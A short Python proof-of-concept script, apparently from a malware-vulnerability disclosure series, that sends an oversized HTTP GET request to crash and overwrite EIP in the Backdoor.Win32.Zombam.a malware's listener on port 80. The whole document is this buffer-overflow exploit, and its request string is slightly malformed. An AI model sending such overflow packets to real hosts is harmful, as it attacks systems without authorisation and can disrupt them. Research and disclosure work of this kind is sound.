'''
Description: The malware listens on TCP port 80, sending an
HTTP GET request with 300 or more bytes will trigger buffer
overflow overwriting EIP. Type: PE32
'''
from socket import *
MALWARE_HOST="x.x.x.x"
PORT=80
PACKET="GET /"+"A"*300+"HTTP/1.0\r\nHost: "+MALWARE_HOST
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.send(PACKET)
s.close()
print("Backdoor.Win32.Zombam.a / Remote Stack Buffer Overflow")
print("MD5: 6c5081e9b65a52963b0b1ae612ef7eb4")
print("By Malvuln")